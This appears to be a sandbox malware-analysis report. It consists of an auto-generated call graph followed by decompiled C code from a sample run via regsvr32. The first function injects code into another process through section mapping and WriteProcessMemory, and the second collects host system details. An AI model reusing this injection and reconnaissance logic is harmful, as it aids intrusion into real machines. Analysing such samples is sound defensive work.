13459->13460 13460->13452 13463 49e1b5d 13461->13463 13462 49e1bc7 13465 49ea065 GetSystemTimeAsFileTime 13462->13465 13463->13462 13464 49ea065 GetSystemTimeAsFileTime 13463->13464 13467 49e1c58 13463->13467 13464->13463 13466 49e1bd1 GetCurrentThread 13465->13466 13469 49e1bf8 DuplicateHandle 13466->13469 13467->13460 13470 49e8d6d memset 13469->13470 13471 49e1c0b 13470->13471 13481 49e2c5b 13471->13481 13475 49e1c3e 13476 49e1c4d 13475->13476 13515 49e6d74 13475->13515 13478 49e8bf4 2 API calls 13476->13478 13478->13467 13479 49e1c2b 13479->13475 13480 49eaa65 6 API calls 13479->13480 13480->13475 13482 49ea9b8 4 API calls 13481->13482 13483 49e2c64 13482->13483 13484 49e1c1b 13483->13484 13485 49e2be4 9 API calls 13483->13485 13490 49e19ec 13484->13490 13488 49e2c79 13485->13488 13486 49e2c94 13486->13484 13487 49e9880 RtlAllocateHeap 13486->13487 13487->13484 13488->13486 13489 49e9880 RtlAllocateHeap 13488->13489 13489->13486 13491 49e1a0c 13490->13491 13492 49e1a50 13490->13492 13493 49ea9b8 4 API calls 13491->13493 13494 49e1ac6 13492->13494 13497 49ea96c 4 API calls 13492->13497 13496 49e1a14 13493->13496 13501 49e1ace 13494->13501 13561 49e171a 13494->13561 13499 49ea96c 4 API calls 13496->13499 13498 49e1a73 13497->13498 13500 49e1aab 13498->13500 13546 49e16e5 13498->13546 13502 49e1a20 13499->13502 13550 49e158a 13500->13550 13501->13479 13504 49e1a3d 13502->13504 13542 49e9edb 13502->13542 13503 49e1b2e 13507 49e8bf4 2 API calls 13503->13507 13505 49e8bf4 2 API calls 13504->13505 13505->13492 13507->13501 13511 49e9edb memset 13513 49e1adf 13511->13513 13512 49e9edb memset 13512->13500 13513->13501 13513->13503 13513->13511 13514 49e158a 7 API calls 13513->13514 13514->13513 13516 49e8bf4 2 API calls 13515->13516 13517 49e6d94 13516->13517 13518 49e8bf4 2 API calls 13517->13518 13519 49e6d9e 13518->13519 13520 49e8bf4 2 API calls 13519->13520 13521 49e6da8 13520->13521 13522 49e8bf4 2 API calls 13521->13522 13523 49e6db2 13522->13523 13524 49e8bf4 2 
API calls 13523->13524 13525 49e6dbc 13524->13525 13526 49e8bf4 2 API calls 13525->13526 13527 49e6dc6 13526->13527 13528 49e8bf4 2 API calls 13527->13528 13532 49e6dd0 13528->13532 13529 49e6e76 13533 49e8bf4 2 API calls 13529->13533 13530 49e6e6e 13536 49e8bf4 2 API calls 13530->13536 13531 49e6e3e 13531->13529 13531->13530 13535 49e8bf4 2 API calls 13531->13535 13532->13531 13540 49e8bf4 HeapFree memset 13532->13540 13541 49e6e28 13532->13541 13537 49e6e85 13533->13537 13534 49e8bf4 2 API calls 13538 49e6e36 13534->13538 13535->13531 13536->13529 13537->13476 13539 49e8bf4 2 API calls 13538->13539 13539->13531 13540->13532 13541->13534 13543 49e9ee7 13542->13543 13544 49e9f0c 13543->13544 13545 49e9f00 memset 13543->13545 13544->13504 13545->13544 13547 49e16ee 13546->13547 13548 49f3674 2 API calls 13547->13548 13549 49e170c 13547->13549 13548->13547 13549->13512 13551 49ea065 GetSystemTimeAsFileTime 13550->13551 13552 49e15a5 13551->13552 13553 49ea065 GetSystemTimeAsFileTime 13552->13553 13554 49e15ad 13553->13554 13555 49ea205 6 API calls 13554->13555 13557 49e15d2 13555->13557 13556 49e15da 13556->13494 13557->13556 13558 49ea065 GetSystemTimeAsFileTime 13557->13558 13559 49e161a 13557->13559 13558->13557 13560 49ea15b 2 API calls 13559->13560 13560->13556 13598 49eab05 13561->13598 13564 49e1774 13565 49e8bf4 2 API calls 13564->13565 13567 49e178a 13565->13567 13568 49e1080 2 API calls 13567->13568 13569 49e1794 13568->13569 13570 49eb1a4 7 API calls 13569->13570 13571 49e17af 13570->13571 13572 49e8b9c 2 API calls 13571->13572 13573 49e17bd 13572->13573 13574 49e1828 13573->13574 13575 49e1080 2 API calls 13573->13575 13576 49e1830 13574->13576 13605 49e8bde RtlAllocateHeap 13574->13605 13578 49e17cc 13575->13578 13576->13513 13579 49e8f2e 4 API calls 13578->13579 13580 49e17dc 13579->13580 13581 49e8b9c 2 API calls 13580->13581 13586 49e17e9 13581->13586 13582 49e8bf4 2 API calls 13583 49e19cb 13582->13583 13584 49e8bf4 2 API calls 13583->13584 
13584->13576 13585 49e1805 13588 49e8bf4 2 API calls 13585->13588 13586->13585 13587 49e1663 3 API calls 13586->13587 13587->13585 13590 49e181e 13588->13590 13589 49ea96c 4 API calls 13597 49e191d 13589->13597 13591 49e92de 6 API calls 13590->13591 13591->13574 13592 49e19b8 13592->13582 13593 49e1843 13593->13589 13593->13592 13594 49f3674 2 API calls 13594->13597 13595 49e198e 13595->13592 13596 49e16e5 2 API calls 13595->13596 13596->13595 13597->13594 13597->13595 13599 49eab20 4 API calls 13598->13599 13600 49e1758 13599->13600 13600->13564 13601 49e1663 13600->13601 13603 49e1680 13601->13603 13602 49e8c72 3 API calls 13602->13603 13603->13602 13604 49e16d5 13603->13604 13604->13564 13605->13593 11228 49e64ef 11229 49e64fd 11228->11229 11234 49e6555 11228->11234 11257 49e8bc9 HeapCreate 11229->11257 11231 49e6502 11258 49e9591 11231->11258 11241 49e655a 11278 49e8baf 11241->11278 11242 49e6550 11243 49e8baf 2 API calls 11242->11243 11243->11234 11250 49e65b1 CreateThread 11250->11234 11358 49e6298 11250->11358 11251 49ef05c 8 API calls 11252 49e658c 11251->11252 11291 49e6370 memset 11252->11291 11257->11231 11310 49e8bde RtlAllocateHeap 11258->11310 11260 49e6507 11261 49f3cd5 11260->11261 11262 49f3d0a 11261->11262 11311 49e8c43 11262->11311 11264 49e6515 11265 49ef05c 11264->11265 11315 49e9dd8 11265->11315 11268 49ef07e GetModuleHandleA 11270 49ef08d 11268->11270 11269 49ef086 LoadLibraryA 11269->11270 11271 49ef09b 11270->11271 11318 49ef011 11270->11318 11323 49e8b9c 11271->11323 11275 49e9df2 11341 49e8ac6 11275->11341 11277 49e653c GetFileAttributesW 11277->11241 11277->11242 11279 49e8bbd 11278->11279 11280 49e655f 11278->11280 11281 49e8bf4 2 API calls 11279->11281 11282 49e109a 11280->11282 11281->11280 11283 49e8ac6 2 API calls 11282->11283 11284 49e10b5 11283->11284 11285 49e9cb5 11284->11285 11286 49e9cd1 11285->11286 11288 49e6573 11286->11288 11347 49e8bde RtlAllocateHeap 11286->11347 11288->11250 11288->11251 11289 49e9ce4 11289->11288 11290 

Control-flow Graph

C-Code - Quality: 95%
E049ED447(void* __ecx, intOrPtr __edx) {
	void* _v8;
	void* _v12;
	void* _v16;
	void* _v20;
	long _v24;
	long _v28;
	short _v32;
	char _v36;
	intOrPtr* _v40;
	intOrPtr _v44;
	long _v48;
	void* _v52;
	void* _v53;
	char _v64;
	short _v68;
	struct _WNDCLASSEXA _v116;
                                                                                                                                                                        				char _t81;
                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				intOrPtr _t90;
                                                                                                                                                                        				char _t97;
                                                                                                                                                                        				short _t98;
                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                        				long _t107;
                                                                                                                                                                        				char _t119;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				struct HWND__* _t132;
                                                                                                                                                                        				void* _t138;
                                                                                                                                                                        				void* _t147;
                                                                                                                                                                        				void* _t154;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t157;
                                                                                                                                                                        				void* _t158;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        
                                                                                                                                                                        				_t81 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                        				_v12 = __ecx;
                                                                                                                                                                        				_t157 = __edx;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                        				_v48 = 0;
                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
                                                                                                                                                                        					E049EF0DE(0x1f4);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t12 = _t157 + 0x3c; // 0x852c50ff
                                                                                                                                                                        				_t83 =  *_t12 + _t157;
                                                                                                                                                                        				_v28 = _t138;
                                                                                                                                                                        				_v40 = _t83;
                                                                                                                                                                        				if( *_t83 != 0x4550) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					_t158 = _v12;
                                                                                                                                                                        					L15:
                                                                                                                                                                        					if(_v8 != _t138) {
                                                                                                                                                                        						_t90 =  *0x49ff918; // 0x4bef9f0
                                                                                                                                                                        						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
                                                                                                                                                                        						_v8 = _t138;
                                                                                                                                                                        					}
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                        						_t87 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                        						NtClose(_v20);
                                                                                                                                                                        					}
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        				_v52 =  *((intOrPtr*)(_t83 + 0x50));
                                                                                                                                                                        				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
                                                                                                                                                                        					goto L14;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t97 =  *"18293"; // 0x39323831
                                                                                                                                                                        				_v36 = _t97;
                                                                                                                                                                        				_t98 =  *0x49fce44; // 0x33
                                                                                                                                                                        				_v32 = _t98;
                                                                                                                                                                        				_v116.lpszClassName =  &_v64;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.lpfnWndProc = DefWindowProcW;
                                                                                                                                                                        				_v116.cbWndExtra = _t138;
                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                        				_v116.style = 0xb;
                                                                                                                                                                        				_v116.lpszMenuName = _t138;
                                                                                                                                                                        				_v116.cbSize = 0x30;
                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                        				_v116.cbClsExtra = _t138;
                                                                                                                                                                        				_v116.hInstance = _t138;
                                                                                                                                                                        				if(RegisterClassExA( &_v116) != 0) {
                                                                                                                                                                        					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
                                                                                                                                                                        					if(_t132 != 0) {
                                                                                                                                                                        						DestroyWindow(_t132);
                                                                                                                                                                        						UnregisterClassA( &_v64, _t138);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_t105 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
                                                                                                                                                                        				_t158 = _v12;
                                                                                                                                                                        				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
                                                                                                                                                                        					goto L15;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t154 = E049E8C43( *0x49ff81c, 0x1ac4);
                                                                                                                                                                        					_v36 = _t154;
                                                                                                                                                                        					if(_t154 == 0) {
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
                                                                                                                                                                        					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
                                                                                                                                                                        					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
                                                                                                                                                                        					E049E8BF4( &_v36, 0x1ac4);
                                                                                                                                                                        					_t119 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t155 =  *0x49ff830; // 0x49e0000
                                                                                                                                                                        					_v36 = _t119;
                                                                                                                                                                        					 *0x49ff830 = _v8;
                                                                                                                                                                        					 *0x49ff81c = _t163;
                                                                                                                                                                        					E049E8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
                                                                                                                                                                        					E049ED3C6(_v16, _v8, _v44);
                                                                                                                                                                        					_t124 = E049EA43D("quatr");
                                                                                                                                                                        					_v53 = _t138;
                                                                                                                                                                        					_t147 = 0xf;
                                                                                                                                                                        					if(_t124 > _t147) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							_t63 = _t138 + 0x41; // 0x41
                                                                                                                                                                        							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
                                                                                                                                                                        							_t138 = _t138 + 1;
                                                                                                                                                                        						} while (_t138 < _t147);
                                                                                                                                                                        						L13:
                                                                                                                                                                        						lstrlenW( &_v68);
                                                                                                                                                                        						 *0x49ff830 = _t155;
                                                                                                                                                                        						 *0x49ff81c = _v36;
                                                                                                                                                                        						goto L17;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t147 = _t124;
                                                                                                                                                                        					if(_t147 == 0) {
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L12;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x049ed4c4
                                                                                                                                                                        0x049ed4cc
                                                                                                                                                                        0x049ed4d4
                                                                                                                                                                        0x049ed4da
                                                                                                                                                                        0x049ed4e1
                                                                                                                                                                        0x049ed4e9
                                                                                                                                                                        0x049ed4ea
                                                                                                                                                                        0x049ed4f1
                                                                                                                                                                        0x049ed4f4
                                                                                                                                                                        0x049ed4f5
                                                                                                                                                                        0x049ed4fc
                                                                                                                                                                        0x049ed4ff
                                                                                                                                                                        0x049ed506
                                                                                                                                                                        0x049ed507
                                                                                                                                                                        0x049ed50a
                                                                                                                                                                        0x049ed516
                                                                                                                                                                        0x049ed538
                                                                                                                                                                        0x049ed540
                                                                                                                                                                        0x049ed543
                                                                                                                                                                        0x049ed54e
                                                                                                                                                                        0x049ed54e
                                                                                                                                                                        0x049ed540
                                                                                                                                                                        0x049ed56a
                                                                                                                                                                        0x049ed579
                                                                                                                                                                        0x049ed57c
                                                                                                                                                                        0x049ed581
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed5ab
                                                                                                                                                                        0x049ed5bb
                                                                                                                                                                        0x049ed5bd
                                                                                                                                                                        0x049ed5c4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed5d9
                                                                                                                                                                        0x049ed5ec
                                                                                                                                                                        0x049ed600
                                                                                                                                                                        0x049ed60c
                                                                                                                                                                        0x049ed611
                                                                                                                                                                        0x049ed616
                                                                                                                                                                        0x049ed61c
                                                                                                                                                                        0x049ed622
                                                                                                                                                                        0x049ed62a
                                                                                                                                                                        0x049ed63a
                                                                                                                                                                        0x049ed646
                                                                                                                                                                        0x049ed650
                                                                                                                                                                        0x049ed658
                                                                                                                                                                        0x049ed65d
                                                                                                                                                                        0x049ed660
                                                                                                                                                                        0x049ed668
                                                                                                                                                                        0x049ed668
                                                                                                                                                                        0x049ed668
                                                                                                                                                                        0x049ed66b
                                                                                                                                                                        0x049ed66f
                                                                                                                                                                        0x049ed670
                                                                                                                                                                        0x049ed674
                                                                                                                                                                        0x049ed678
                                                                                                                                                                        0x049ed681
                                                                                                                                                                        0x049ed687
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed687
                                                                                                                                                                        0x049ed662
                                                                                                                                                                        0x049ed666
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed666

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL(049ED982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 049ED4B9
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 049ED50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 049ED538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 049ED543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 049ED54E
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(049ED982,00000000), ref: 049ED579
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(049ED982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 049ED5A0
                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 049ED5E6
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 049ED600
                                                                                                                                                                          • Part of subcall function 049E8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 049E8C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,049E61C5), ref: 049ED678
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 049ED6C0
                                                                                                                                                                        • NtClose.NTDLL(00000000), ref: 049ED6D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 494031690-2640591812
                                                                                                                                                                        • Opcode ID: 5ab2aed8b99570b94f6076ad49b3497b83e91ce21dee827b3127d2bcb77545e9
                                                                                                                                                                        • Instruction ID: d64c203aee17315030ce59116f5d36abf31d405c25ada9d8d6ff8aa44ab815de
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab2aed8b99570b94f6076ad49b3497b83e91ce21dee827b3127d2bcb77545e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 418118B5A00209EFDB11DF95D884EEEBBB8FB08704F14417AE605E7290D774AE45CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E049EDF3D(void* __fp0) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v144;
                                                                                                                                                                        				char _v656;
                                                                                                                                                                        				char _v668;
                                                                                                                                                                        				char _v2644;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				int _t90;
                                                                                                                                                                        				intOrPtr _t92;
                                                                                                                                                                        				void* _t93;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                        				short _t106;
                                                                                                                                                                        				char _t108;
                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                        				intOrPtr _t116;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				intOrPtr _t123;
                                                                                                                                                                        				intOrPtr _t134;
                                                                                                                                                                        				intOrPtr _t136;
                                                                                                                                                                        				intOrPtr _t138;
                                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t148;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        				WCHAR* _t150;
                                                                                                                                                                        				char* _t151;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t192;
                                                                                                                                                                        				void* _t193;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				char _t198;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				char* _t200;
                                                                                                                                                                        				void* _t203;
                                                                                                                                                                        				int* _t204;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        
                                                                                                                                                                        				_t216 = __fp0;
                                                                                                                                                                        				_t148 =  *0x49ff830; // 0x49e0000
                                                                                                                                                                        				_t68 = E049E8BDE(0x1ac4);
                                                                                                                                                                        				_t192 = _t68;
                                                                                                                                                                        				if(_t192 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                        					_t70 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
                                                                                                                                                                        					_t3 = _t192 + 0x648; // 0x648
                                                                                                                                                                        					E049F3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
                                                                                                                                                                        					_t73 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_t5 = _t192 + 0x1644; // 0x1644
                                                                                                                                                                        					_t194 = _t5;
                                                                                                                                                                        					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
                                                                                                                                                                        					_t207 = _t74;
                                                                                                                                                                        					if(_t74 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x1854)) = E049E95F3(_t194, _t207);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t75 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_t77 = E049EC879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
                                                                                                                                                                        					_t159 =  *_t77;
                                                                                                                                                                        					if(E049EC9F4( *_t77) == 0) {
                                                                                                                                                                        						_t79 = E049EC8C9(_t159, _t194); // executed
                                                                                                                                                                        						__eflags = _t79;
                                                                                                                                                                        						_t162 = (0 | _t79 > 0x00000000) + 1;
                                                                                                                                                                        						__eflags = _t162;
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = 3;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t14 = _t192 + 0x220; // 0x220, executed
                                                                                                                                                                        					_t80 = E049EF3A3(_t14); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
                                                                                                                                                                        					_t81 = E049EF368(_t14); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
                                                                                                                                                                        					_t17 = _t192 + 0x114; // 0x114
                                                                                                                                                                        					_t195 = _t17;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                        					_v12 = 0x80;
                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                        					_v8 = 0x100;
                                                                                                                                                                        					_push( &_v656);
                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                        					_push(_t195);
                                                                                                                                                                        					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
                                                                                                                                                                        					_t87 =  *0x49ff820; // 0x4befaa0
                                                                                                                                                                        					_push(0); // executed
                                                                                                                                                                        					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        					}
                                                                                                                                                                        					_t90 = GetSystemMetrics(0x1000);
                                                                                                                                                                        					_t28 = _t192 + 0x228; // 0x228
                                                                                                                                                                        					_t149 = _t28;
                                                                                                                                                                        					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
                                                                                                                                                                        					E049EDF36(_t149); // executed
                                                                                                                                                                        					_t211 = _t149;
                                                                                                                                                                        					if(_t149 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x434)) = E049E95F3(_t149, _t211);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t92 = E049EC6CE();
                                                                                                                                                                        					_t33 = _t192 + 0xb0; // 0xb0
                                                                                                                                                                        					_t196 = _t33;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
                                                                                                                                                                        					_t93 = E049EC4C1(_t92, _t33, _t211, _t216);
                                                                                                                                                                        					_t35 = _t192 + 0xd0; // 0xd0
                                                                                                                                                                        					E049E99DF(_t93, _t33, _t35);
                                                                                                                                                                        					_t36 = _t192 + 0x438; // 0x438
                                                                                                                                                                        					E049E960D(_t149, _t36);
                                                                                                                                                                        					_t97 = E049EE2C5(_t196, E049EA43D(_t33), 0);
                                                                                                                                                                        					_t37 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E049EC6E4(_t97, _t37, _t216);
                                                                                                                                                                        					_t99 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_t101 = E049ECA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
                                                                                                                                                                        					E049E8D6D(_t192, 0, 0x9c);
                                                                                                                                                                        					_t204 = _t203 + 0xc;
                                                                                                                                                                        					_t192->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                        					GetVersionExA(_t192);
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xa8)) = E049EDD39(_t100);
                                                                                                                                                                        					_t106 = E049EDD62(_t105);
                                                                                                                                                                        					_t41 = _t192 + 0x1020; // 0x1020
                                                                                                                                                                        					_t150 = _t41;
                                                                                                                                                                        					 *((short*)(_t192 + 0x9c)) = _t106;
                                                                                                                                                                        					GetWindowsDirectoryW(_t150, 0x104);
                                                                                                                                                                        					_t108 = E049E9DF2(_t105, 0x9cf);
                                                                                                                                                                        					_t177 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_t198 = _t108;
                                                                                                                                                                        					 *_t204 = 0x104;
                                                                                                                                                                        					_push( &_v668);
                                                                                                                                                                        					_push(_t198);
                                                                                                                                                                        					_v8 = _t198;
                                                                                                                                                                        					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
                                                                                                                                                                        						_t143 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
                                                                                                                                                                        					}
                                                                                                                                                                        					E049E8BAF( &_v8);
                                                                                                                                                                        					_t113 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_t48 = _t192 + 0x1434; // 0x1434
                                                                                                                                                                        					_t199 = _t48;
                                                                                                                                                                        					 *_t204 = 0x209;
                                                                                                                                                                        					_push(_t199);
                                                                                                                                                                        					_push(L"USERPROFILE");
                                                                                                                                                                        					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
                                                                                                                                                                        						E049E9E51(_t199, 0x105, L"%s\\%s", _t150);
                                                                                                                                                                        						_t141 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						_t204 =  &(_t204[5]);
                                                                                                                                                                        						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x20a);
                                                                                                                                                                        					_t51 = _t192 + 0x122a; // 0x122a
                                                                                                                                                                        					_t151 = L"TEMP";
                                                                                                                                                                        					_t116 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_push(_t151);
                                                                                                                                                                        					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
                                                                                                                                                                        						_t138 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x40);
                                                                                                                                                                        					_t200 = L"SystemDrive";
                                                                                                                                                                        					_push( &_v144);
                                                                                                                                                                        					_t119 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					_push(_t200);
                                                                                                                                                                        					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                                                                                        						_t136 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 0x7f;
                                                                                                                                                                        					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                                                                                        					_t123 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                                                                                        					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E049F3548(E049EE2C5(_t62, E049EA43D(_t62), 0),  &_v2644);
                                                                                                                                                                        					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                        					E049F351A( &_v2644, _t63, 0x20);
                                                                                                                                                                        					_push( &_v2644);
                                                                                                                                                                        					_push(0x1e);
